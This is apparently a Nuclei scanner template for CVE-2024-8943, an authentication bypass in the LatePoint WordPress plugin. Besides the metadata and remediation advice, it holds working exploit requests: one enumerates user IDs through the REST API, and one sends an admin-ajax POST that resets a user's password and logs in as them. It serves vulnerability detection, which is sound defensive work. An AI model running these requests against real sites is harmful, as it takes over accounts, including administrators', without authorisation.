id: CVE-2024-8943

info:
  name: LatePoint <= 5.0.12 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    LatePoint plugin for WordPress versions up to 5.0.12 contains an authentication bypass caused by insufficient verification of user during booking, letting unauthenticated attackers log in as any existing user if they have user ID access, exploit requires access to user ID, and the 'Use WordPress users as customers' setting enabled.
  impact: |
    Attackers can log in as any existing user, including administrators, potentially leading to full site compromise.
  remediation: |
    Update to version 5.0.13 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypass
    - https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8943
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8943
    epss-score: 0.40056
    epss-percentile: 0.97438
    cwe-id: CWE-287
    cpe: cpe:2.3:a:latepoint:latepoint:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: latepoint
    product: latepoint
    framework: wordpress
  tags: cve,cve2024,wp,wordpress,wp-plugin,latepoint,auth-bypass,vkev

variables:
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users"
        - "?rest_route=/wp/v2/users"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "[{\"id", "name\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        name: userid
        json:
          - '.[0].id'
        internal: true

      - type: json
        name: username
        json:
          - '.[0].name'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=latepoint_route_call&route_name=steps__load_step&params=current_step_code%3dcustomer%26step_direction%3dnext%26customer%5bid%5d%3d{{userid}}%26customer%5bemail%5d%3d{{email}}%26customer%5bpassword%5d%3d{{password}}%26customer%5bpassword_confirmation%5d%3d{{password}}%26customer%5bfirst_name%5d%3d{{firstname}}%26customer%5blast_name%5d%3d{{lastname}}&layout=none&return_format=json

    matchers:
      - type: dsl
        dsl:
          - 'contains(set_cookie, "wordpress_logged_in_")'
          - 'contains(body, "\"status\":\"success\"")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100e9904473c8210156a18cfd2e95ce5bc0d0a66a53e3b2f5ddd84ad64bf5b930be022100d239a5219aa8d023d93144493d6c1bd5143178f938db85db7ed5ee11499867b2:922c64590222798bb761d5b6d8e72950